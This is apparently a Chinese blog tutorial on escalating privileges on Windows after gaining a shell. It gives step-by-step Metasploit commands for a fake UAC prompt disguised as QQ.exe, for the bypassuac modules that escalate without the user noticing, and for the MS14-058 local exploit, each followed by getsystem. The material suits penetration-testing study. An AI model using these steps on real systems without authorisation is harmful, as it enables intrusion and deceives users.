KALI拿到shell后提权操作

利用KALI 进行程序提权操作


UAC Exploit/windows/local/ask 模块提权

介绍:
使用: Exploit/windows/local/ask 该命令会在目标机器上弹出需要来自管理员权限的对话框,对方点击‘是’则可将程序权限提至最高级别并未绕过UAC
1.拿到session后将session放入后台
2.执行 use exploit windows/local/ask 使用ask模块
3.在ask模块中首先设置你的session会话的ID

set session id

4.ask模块中也可以设置弹出框的名字表示哪个应用需要来自管理员权限

set filename QQ.exe

5.其他的无需设置直接发起攻击exploit
目标情况:
ask提权.jpg
如过对方选择“是” 那么会生成一个新的session对话 如果 对方选择“否”那么该攻击会在一段时间显示超时

进入到新创建的会话中后我们再次执行getsystem命令进行提权

UAC绕过来提权

上面的提权操作附有交互性,对于警惕性很高的人来说一般不会轻易的点击"是"
下面我们使用一种在对方不知不觉的情况下进行UAC绕过来进行权限的提升。
模块:

Exploit/windows/local/bypassuac             
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs

我们使用bypassuac模块进行提权
1.同上面第一步操作
2.执行 use exploit/windows/local/bypassuac”进 使用bypassuac模块
3.设置你的session会话的ID

set session id

4.直接发起攻击exploit
5.进入新建的session中执行getsystem进行提权

绕过UAC_bypassuac.jpg

利用提权漏洞进行提权

模块:Exploit/windows/local/ms14_058_track_popup_menu
1.执行 use exploit/windows/local/ms14_058_track_popup_menu
2.set session id
3.执行 exploit即可提升权限本地漏洞提权
注:该漏洞适用于x86机器

bystart

bystart

青檬小栈

留下你的评论

快留下你的小秘密吧